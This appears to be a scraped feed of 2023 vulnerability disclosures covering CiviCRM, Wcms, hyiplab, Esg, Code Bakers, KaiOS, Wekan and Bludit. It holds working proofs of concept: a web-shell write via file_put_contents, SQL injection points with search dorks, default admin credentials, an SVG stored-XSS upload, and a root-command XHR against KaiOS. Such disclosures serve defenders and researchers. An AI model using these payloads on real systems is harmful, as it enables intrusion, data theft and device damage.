Stored Cross Site Scripting (XSS) vulnerability in the add contact function CiviCRM 5.59.alpha1, allows attackers to execute arbitrary code in first/second name field.

    # Exploit Title: CiviCRM 5.59.alpha1 - Stored XSS (Cross-Site Scripting)# Date: 2023-02-02# Exploit Author: Andrea Intilangelo# Vendor Homepage: https://civicrm.org# Software Link: https://civicrm.org/download# Version: 5.59.alpha1, 5.58.0 (and earlier), 5.57.3 (and earlier)# Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 109.0.1, Microsoft Edge 109.0.1518.70)# CVE: CVE-2023-25440 / Vendor Security Advisory: CIVI-SA-2023-05Description:A stored cross-site scripting (XSS) vulnerability in CiviCRM 5.59.alpha1 allows attacker to execute arbitrary webscripts or HTML.Injecting persistent javascript code inside the "Add Contact" function while creating a contact, in first/second namefield, it will be triggered once page gets loaded.Steps to reproduce:- Quick Add contact to CiviCRM,- Insert a payload PoC inside the field(s)- Click on 'Add contact'.If a user visits the dashboard, as well as "Recently added" box, the javascript code will be rendered.Timeline:2023-01-29: Vulnerability discovered2023-02-02: Request for CVE reservation2023-02-04: Vendor contacted2023-02-06: Vendor replies, acknowledgments and coordinating for advisory2023-02-14: Vendor discloses Security advisory and credits, internal id: CIVI-SA-2023-052023-02-15: Vendor Security Advisory publication on https://civicrm.org/advisory/civi-sa-2023-05-quick-add-widget2023-04-27: Assigned CVE number: CVE-2023-254402023-05-18: CVE publication / disclosure

CVE-2023-25440: CiviCRM 5.59.alpha1 Cross Site Scripting ≈ Packet Storm

In Wcms 0.3.2, an attacker can send a crafted request from a vulnerable web application backend server /wcms/wex/html.php via the finish parameter and the textAreaCode parameter. It can write arbitrary strings into custom file names and upload any files, and write malicious code to execute scripts to trigger command execution.

Hi, dev team! The code in this file is vulnerable: Arbitrary file write And execute the command through this file

**Vulnerability discovery**

Vulnerable code found on lines 20 to 23 in the /wcms/wex/html.php file

if (isset($\_GET\['finish'\])) {
    $path = $\_GET\['finish'\];
    file\_put\_contents($path, $\_POST\['textAreaCode'\]);

Since the finish variable of the GET request and the textAreaCode variable of the POST request are controllable, an attacker can use the file\_put\_contents function to write malicious code into a custom file

**construct poc**

Use controllable variables to write malicious code into the shell.php file in the current directory  
The payload is as follows：

    POST /wangmarket-master/wcms-0.3.2/wcms/wex/html.php?finish=shell.php HTTP/1.1
    Host: 192.168.3.10
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Cookie: PHPSESSID=pdvblj8k9q6rin0oroe36m6s77
    Upgrade-Insecure-Requests: 1
    Content-Length: 36
    
    textAreaCode=<?php system('whoami');?>
    

  
It can be seen that the write is successful  

**get shell**

Access the written malicious file, find that the malicious code is successfully executed, and echo it out

CVE-2023-31689: Arbitrary file write vulnerability in /wcms/wex/html.php · Issue #15 · vedees/wcms

hyiplab version 2.1 leaves a default set of administrative credentials installed post installation.

    ====================================================================================================================================| # Title     : hyiplab V2.1 Insecure Settings Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(64-bit)                                              | | # Vendor    : https://appdevs.net/                                                                                               |  | # Dork      : "Every balance subtracting transactions need OTP verification so You can feel safe about your funds."              |====================================================================================================================================poc :[+] The vulnerability is about leaving the default settings    During the installation of the script and using the default username and password  [+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user=admin  & pass= admin[+] https://127.0.0.1/hyiplab/admin/dashboardGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

hyiplab 2.1 Default Credentials

Esg version 2.5 suffers from a remote SQL injection vulnerability.

    ===========================================================================================| # Title     : Esg 2.5 Sql Injection Vulnerability                                       || # Author    : indoushka                                                                 || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit)     | | # Vendor    : https://www.creatop.com.tw/esg                                            |  | # Dork      : Powered by CREATOP                                                        |===========================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : news.php?tayear=2023[+] http://www.127.0.0.1/vitaltec.com.tw/en/news/news.php?tayear=2023 <==== inject here[+] Panel : /admin/login.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Esg 2.5 SQL Injection

Code Bakers version 1.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Code Bakers v1.0 SQL injection Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit)                                            | | # Vendor    : https://www.codebakers.co.uk/                                                                                      |  | # Dork      : "dishes.php?res_id="                                                                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /dishes.php?res_id= <===== inject here [+] https://127.0.0.1/talwarabazaar.com/dishes.php?res_id=5Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Code Bakers 1.0 SQL Injection

An issue was discovered in KaiOS 3.0 before 3.1. The /system/bin/tctweb_server binary exposes a local web server that responds to GET and POST requests on port 2929. The server accepts arbitrary Bash commands and executes them as root. Because it is not permission or context restricted and returns proper CORS headers, it's accessible to all websites via the browser. At a bare minimum, this allows an attacker to retrieve a list of the user's installed apps, notifications, and downloads. It also allows an attacker to delete local files and modify system properties including the boolean persist.moz.killswitch property (which would render the device inoperable). This vulnerability is partially mitigated by SELinux which prevents reads, writes, or modifications to files or permissions within protected partitions.

**CVE-2023-33294: Execute Commands as Root from KaiOS 3.0 Browser via TCT Web Server**

Vendor: KaiOS Technologies Inc.  
Vendor URL: https://www.kaiostech.com/  
Versions affected: KaiOS 3.0  
Systems Affected: KaiOS-based mobile devices  
Author: Tom Barrasso  
CVE Identifier: CVE-2023-33294  
Risk: Critical

**Summary**

KaiOS is a mobile operating system based on Firefox OS. KaiOS 3.0 comes shipped with a binary, tctweb_server, exposing a local web server that responds to HTTP requests on port 2929. This server responds to GET and POST requests, accepting a application/x-www-form-urlencoded formatted request body with key-value tuples separated by '&', with a '='.  
tctweb_server runs as root. It supports pre-defined commands for getting & setting system properties, reading & writing NV items, and reading files. It also allows for execution of user-provided bash commands. Because the server is exposed on http://127.0.0.1:2929, and it returns the header Access-Control-Allow-Origin: * with every request, it is accessible to all installed apps and websites the system browser.

**Location**

*   Source: /system/bin/tctweb_server

**Impact**

Because tctweb_server runs as root, accepts arbitrary bash commands, and is accessible via the system browser, it has a very high potential for abuse. This risk is partially mitigated by SELinux enforcement. As a result, tctweb_server cannot be used to read, write, or modify files or permissions within protected partitions.  
The following are examples of what can be accomplished simply by visiting a malicious website on a KaiOS 3.0 device.

*   Using cmdshell=readfile to get the list of installed applications (system/b2g/webapps/webapps.json), or user profile data including notifications and downloads (folder: data/b2g/mozilla/*.default/, files: downloads.json, notifications.json)
*   Modifying or deleting local files, i.e. in sdcard/
*   Bricking the device by enabling the kill switch system property persist.moz.killswitch

An attacker can make XMLHttpRequest or fetch requests to http://127.0.0.1:2929 with parameters to run commands as root. In this simple example, the contents of the build.prop file are displayed on screen. 
let xhr = new XMLHttpRequest();
xhr.open('POST', 'http://127.0.0.1:2929', true);
xhr.send('cmd=bash&cmdshell=readfile&filename=system/build.prop');
  

**Recommendation**

Given the strong potential for abuse, the tctweb_server binary should either be permission-restricted to only certified apps or removed altogether. Analysis of builds from the Nokia 2780 Flip suggests that tctweb_server was removed in KaiOS 3.1.

**Demo**

This demo displays the contents of build.prop on sceen.

**KaiOS Version**:

**build.prop**  

**Vendor Communication Timeline**

*   5/2/23: Tom emailed security@kaiostech.com asking for PGP key used for secure communication.
*   5/5/23: Tom disclosed issues to KaiOS Technologies.
*   5/8/23: KaiOS Technologies acknowledged this issue.
*   5/15/23: Tom asked for the current remediation status.

CVE-2023-33294: KaiOS 3.0 Root CLI via TCT Web Server

An issue was discovered in KaiOS 3.0 and 3.1. The binary /system/kaios/api-daemon exposes a local web server on *.localhost with subdomains for each installed applications, e.g., myapp.localhost. An attacker can make fetch requests to api-deamon to determine if a given app is installed and read the manifest.webmanifest contents, including the app version.

**CVE-2023-33293: Verify Installed App Version on KaiOS 3.0 & 3.1**

Vendor: KaiOS Technologies Inc.  
Vendor URL: https://www.kaiostech.com/  
Versions affected: KaiOS 3.0, KaiOS 3.1  
Systems Affected: KaiOS-based mobile devices  
Author: Tom Barrasso  
CVE Identifier: CVE-2023-33293  
Risk: Low

**Summary**

KaiOS is a mobile operating system based on Firefox OS. The operating system comes with the api-daemon binary exposing a local web server that responds to HTTP requests on port 80 under the hostname localhost. This server also exposes subdomains for each installed applications, http://myapp.localhost, as well as reserved hostnames cached.localhost for cached Progressive Web Apps (PWAs) and shared.localhost for a bundle of shared system resources. These can be used to fetch assets that are part of the application's bundle.  

**Location**

*   Source: /system/kaios/api-daemon

**Impact**

An attacker can make fetch requests to determine if a given app is installed. Given that KaiOS 3.0 has about ~400 apps available, it's easily feasible to replicate the process to return all installed apps.  
Exposing whether the user has a given app installed can be used for digital fingerprinting as well as targeted phishing. Additionally, because the manifest is returned in the HTTP response with proper CORS headers, it is also possible to extract additional information such as the app version.  

**Recommendation**

api-daemon should check the Origin header and only return valid responses for the same application, or to shared.localhost. These checks could be further extended to encompass Digital Asset Links validation used by Android and iOS to allow a website to check if related apps are installed. This approach is more robust but would allow websites, not just apps, to check if their corresponding app is installed.

**Demo**

This demo lists all installed applications and their installed version. It does not check installed PWAs, but cound be adapted to check http://cached.localhost/myapp/.

**KaiOS Version**:

**App List**  

**Vendor Communication Timeline**

*   5/2/23: Tom emailed security@kaiostech.com asking for PGP key used for secure communication.
*   5/5/23: Tom disclosed issues to KaiOS Technologies.
*   5/8/23: KaiOS Technologies acknowledged this issue.
*   5/15/23: Tom asked for the current remediation status.

CVE-2023-33293: KaiOS 3.0 App Install Exposure

Wekan v6.84 and earlier is vulnerable to Cross Site Scripting (XSS). An attacker with user privilege on kanban board can insert JavaScript code in in "Reaction to comment" feature.

CVE-2023-31779: wekan/CHANGELOG.md at master · wekan/wekan

CiviCRM version 5.59.alpha1 suffers from a persistent cross site scripting vulnerability.

CiviCRM 5.59.alpha1 Cross Site Scripting

Bludit CMS version 3.14.1 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS)(Authenticated)# Date: 2023-04-15# Exploit Author: Rahad Chowdhury# Vendor Homepage: https://www.bludit.com/# Software Link: https://github.com/bludit/bludit/releases/tag/3.14.1# Version: 3.14.1# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53# CVE: CVE-2023-31698SVG Payload-------------<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><script type="text/javascript">alert(document.domain);</script></svg>save this SVG file xss.svgSteps to Reproduce:1. At first login your admin panel.2. then go to setting and click logo section.3. Now upload xss.svg file so your request data will bePOST /bludit/admin/ajax/logo-upload HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/112.0Content-Type: multipart/form-data;boundary=---------------------------15560729415644048492005010998Referer: http://127.0.0.1/bludit/admin/settingsCookie: BLUDITREMEMBERUSERNAME=admin;BLUDITREMEMBERTOKEN=139167a80807781336bc7484552bc985;BLUDIT-KEY=tmap19d0m813e8rqfft8rsl74iContent-Length: 651-----------------------------15560729415644048492005010998Content-Disposition: form-data; name="tokenCSRF"626c201693546f472cdfc11bed0938aab8c6e480-----------------------------15560729415644048492005010998Content-Disposition: form-data; name="inputFile"; filename="xss.svg"Content-Type: image/svg+xml<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><script type="text/javascript">alert(document.domain);</script></svg>-----------------------------15560729415644048492005010998--4. Now open logo image link that you upload. You will see XSS pop up.

Tag

#firefox